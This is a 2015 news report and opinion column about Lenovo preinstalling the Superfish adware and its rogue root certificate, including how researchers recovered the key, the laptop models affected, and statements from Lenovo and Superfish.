This article is more than 1 year old
So long, Lenovo, and no thanks for all the super-creepy Superfish
Laptop biz CTO says there's no security risk – which is why it's labelled it 'severe'
+Comment Chinese PC maker Lenovo has published instructions on how to scrape off the Superfish adware it installed on its laptops – but still bizarrely insists it has done nothing wrong.
That's despite rating the severity of the deliberate infection as "high" on its own website. Well played, Lenonope.
Superfish was bundled on new Lenovo Windows laptops with a root CA certificate so it could intercept even HTTPS-protected websites visited by the user and inject ads into the pages. Removing the Superfish badware will leave behind the root certificate – allowing miscreants to lure Lenovo owners to websites masquerading as online banks, webmail and other legit sites, and steal passwords in man-in-the-middle attacks.
"Superfish was previously included on some consumer notebook products shipped in a short window between September and December to help customers potentially discover interesting products while shopping," Lenovo said in a statement on Thursday.
"We know that users reacted to this issue with concern, and so we have taken direct action to stop shipping any products with this software. We will continue to review what we do and how we do it in order to ensure we put our user needs, experience and priorities first."
Step-by-step instructions on how to remove the Superfish application, and the certificate it uses to impersonate trusted sites, have been published by Lenovo. Firefox users may have to take extra steps.
If you use any of the following products, or someone you know does, you should check it for Superfish's crapware:
E10-30, Flex2 14, Flex2 15, Flex2 14D, Flex2 15D, Flex2 14 (BTM), Flex2 15 (BTM), Flex 10, G410, G510, G40-70, G40-30, G40-45, G50-70, G50-30, G50-45, Miix2 – 8, Miix2 – 10, Miix2 – 11, S310, S410, S415, S415 Touch, S20-30, S20-30 Touch, S40-70, U330P, U430P, U330Touch, U430Touch, U540Touch, Y430P, Y40-70, Y50-70, Yoga2-11BTM, Yoga2-11HSW, Yoga2-13, Yoga2Pro-13, Z40-70, Z40-75, Z50-70, and Z50-75.
Security experts are warning that the Superfish code is so badly designed that it is easy to extract the private key to its root CA certificate. This private key can be used to generate SSL certificates that a nefarious website can use to masquerade as a legit site.
For example, if you're a bad person working in a cafe with control over its public Wi-Fi, and you see an affected Lenovo user join your network, you can attempt to redirect their connection to an online bank to your own password-stealing server. Your server can use a rogue SSL certificate generated from Superfish's leaked private key to masquerade as the bank's dotcom. The Superfish root CA certificate on the laptop tells the browser to trust the dodgy connection – and user will be none the wiser (unless they inspect the SSL session, which no one does).
In the past 24 hours websites such as canibesuperphished.com and filippo.io/Badfish/ have been created to identify PCs with the rogue root CA installed, using SSL certificates signed by the leaked private key. If you're on a Lenovo machine and you don't see any errors about the HTTPS connection to these websites in your web browsers, you've got the bad certificate installed.
Performed more than 138k checks for Superfish, >14500 resulted positive. Most traffic now coming from Japan. https://t.co/LGk8cAzhKn— Filippo Valsorda (@FiloSottile) February 20, 2015
Rob Graham from Errata Security searched the Superfish files using the good old UNIX command
strings to pull out possible passwords to decrypt the software's embedded private key. He discovered the passphrase 'komodia' in just a few hours – allowing him to extract the secret key.
I extracted the #SuperFish certificate and cracked the password: http://t.co/mBg42VBn46 pic.twitter.com/fNLT4EHHhH— Rob Graham (@ErrataRob) February 19, 2015
That password is important for another reason too – it points to where Superfish's developers may have got their code. Komodia is a computer security firm which makes software called SSL Digestor, which works in a very similar way to Superfish to break SSL encryption and inject advertising.
Whoops, our bad
The software was preinstalled on a range of Lenovo's consumer laptops, a move Peter Hortensius, the firm's chief technology officer, admitted was a mistake. But he said that there were no security risks with using software which borks HTTPS.
"We’re not trying to get into an argument with the security guys," he told the Wall Street Journal. "They’re dealing with theoretical concerns. We have no insight that anything nefarious has occurred. But we agree that this was not something we want to have on the system, and we realized we needed to do more."
Normally Lenovo performs due diligence on all software it preinstalls but in this case the vetting procedure was not carried out well enough, he opined. The inclusion of such software is apparently covered in the tedious end user license agreement that no one reads.
In an extended statement Lenovo said Superfish wasn't a major contributor to the manufacturer's bottom line, and said the software did not build personal profiles of users – just advertising tailored to whatever the victim was browsing.
"Superfish has not been active on Lenovo laptops since December," Superfish's CEO Adi Pinhas told El Reg in a statement.
"It is important to note: Superfish is completely transparent in what our software does and at no time were consumers vulnerable - we stand by this today. Lenovo will be releasing a statement later today with all of the specifics that clarify that there has been no wrong doing on our end."
That remains to be seen. Lenovo has a very close relationship with Microsoft as a top-flight box maker, and Redmond told El Reg today that it is probing the situation to see if the inclusion of the software breaks any of its licensing rules.
“We are looking into reports on this third-party issue,” a Microsoft spokesperson said.
+Comment by Reg man Iain Thomson
I've written this article on Lenovo hardware, indeed I've used ThinkPads for the last 15 years as professional journalist and loved them dearly – the keyboard is superb, the build quality excellent, and my current custom system has lettering on keys worn off from repeated hammering.
But in light of the Superfish case, the firm can forget about any more repeat business. Enough is enough; this case is as egregious as the Sony rootkit debacle a decade ago that led to the music company being shunned by the security conscious.
No one does clean PC builds any more. They almost all come loaded with trial versions of applications, sample packs of stuff, and OEM tools. You expect it, and savvy users know to wipe clean any new machine. Non-savvy users are left to put up with it.
But although this stuff is annoying, there's a world of difference between getting a month's free trial of Norton or LoJack that's easily identifiable – and having something like Superfish's gear installed surreptitiously. Lenovo didn’t make any clear mention of having such code on its systems, because had it done so no one would have bought its hardware.
Thankfully, ThinkPads weren't getting the Superfish software, only consumer PCs. But that doesn't change the fact that Lenovo had such contempt for a portion of its user base that it was willing to sacrifice their privacy and security to make 30 pieces of silver.
If Lenovo is willing to build poorly written crapware like Superfish into its systems then the company can no longer be trusted to maintain even a pretense of having its customer's best interests at heart.
It'll be sad to let go of my laptop when it reaches end of life, but Lenovo won’t be getting another cent of my PC budget from now on. Based on the feedback we're getting from readers quite a few of you feel the same way. ®